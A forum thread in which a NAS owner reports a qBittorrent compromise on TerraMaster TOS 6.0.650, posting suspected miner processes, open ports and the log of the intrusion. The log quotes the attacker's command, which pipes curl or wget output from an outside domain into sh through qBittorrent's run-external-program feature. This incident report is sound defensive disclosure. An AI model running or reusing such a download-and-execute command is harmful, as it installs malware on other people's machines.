Page 1 of 1

Vulnerability in qbittorrent on TNAS TOS 6.0.650

Posted: 01 Jun 2025, 17:17
by Dividebysandwich
On May 31st, the following two processes were started on my TNAS through what I can only assume to be a vulnerability in qbittorrent:

Code: Select all

qbittor+ 2529723  252 14.5 2451080 2349244 ?     Ssl  May31 4456:33 ./gFjke
qbittor+ 2529748  251 14.6 2451064 2353448 ?     Ssl  May31 4438:19 ./8Lq3
Open ports:

Code: Select all

Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:25257         0.0.0.0:*               LISTEN      2529723/./gFjke
tcp        0      0 192.168.178.20:25257    0.0.0.0:*               LISTEN      2529723/./gFjke
tcp6       0      0 ::1:25257               :::*                    LISTEN      2529723/./gFjke
tcp6       0      0 fe80::69df:a02f:c:25257 :::*                    LISTEN      2529723/./gFjke
udp        0      0 0.0.0.0:6771            0.0.0.0:*                           2529723/./gFjke
udp        0      0 0.0.0.0:6771            0.0.0.0:*                           2529723/./gFjke
udp     5120      0 192.168.178.20:25257    0.0.0.0:*                           2529723/./gFjke
udp        0      0 127.0.0.1:25257         0.0.0.0:*                           2529723/./gFjke
udp        0      0 0.0.0.0:1701            0.0.0.0:*                           2368/xl2tpd
udp        0      0 192.168.178.20:1900     0.0.0.0:*                           2529723/./gFjke
udp        0      0 192.168.178.20:60917    0.0.0.0:*                           2529723/./gFjke
udp        0      0 192.168.178.20:53097    0.0.0.0:*                           2529723/./gFjke
udp6       0      0 :::6771                 :::*                                2529723/./gFjke
udp6       0      0 :::6771                 :::*                                2529723/./gFjke
udp6       0      0 fe80::69df:a02f:c:25257 :::*                                2529723/./gFjke
udp6       0      0 ::1:25257               :::*                                2529723/./gFjke
The exe entries in /proc were pointing to deleted files in /tmp/

After stopping qbittorrent, these processes persisted of course. Due to the amount of CPU usage I suspect these were crypto miners. Needless to say, I am not at all happy about this, especially considering that all relevant updates have been applied. I am running TOS 6.0.650, the update notification for TOS 6.0.694 just popped up as I was writing this.

EDIT: Ok so, the TNAS qbittorrent version is so ancient, there's not even any point in raising a bug in their github. qbittorrent should be withdrawn from the store immediately, until it is updated.

Re: Vulnerability in qbittorrent on TNAS TOS 6.0.650

Posted: 01 Jun 2025, 18:14
by Dividebysandwich
This has been the entrypoint:

Code: Select all

(N) 2025-05-31T05:23:24 - WebAPI login success. IP: ::ffff:107.174.224.18
(N) 2025-05-31T05:23:25 - Added new torrent. Torrent: "YTS.MX"
(N) 2025-05-31T05:23:25 - Running external program. Torrent: "YTS.MX". Command: `sh -c "(curl -sk https://fulminareDONOTCLICK.top || wg
et --no-check-certificate -qO - https://fulminareDONOTCLICK.top) | sh"`
(N) 2025-05-31T05:23:27 - Torrent download finished. Torrent: "YTS.MX"
(N) 2025-05-31T05:23:27 - Running external program. Torrent: "YTS.MX". Command: `sh -c "(curl -sk https://fulminareDONOTCLICK.top || wg
et --no-check-certificate -qO - https://fulminareDONOTCLICK.top) | sh"`
(N) 2025-05-31T05:23:41 - Torrent removed. Torrent: "YTS.MX"
(N) 2025-05-31T05:23:41 - Torrent content removed. Torrent: "YTS.MX"
As you can imagine, this wasn't me. I have analyzed the malware and it's a UPX packed P2P combination that can do a variety of things, including crypto mining, DDoS, etc.

The NAS had remote access disabled, and was behind a firewall with only one port (for plex) being accessible from the outside. In TNAS settings, UPNP was disabled. No settings have been manually changed in qBittorrent or TNAS to open additional ports or grant outside access.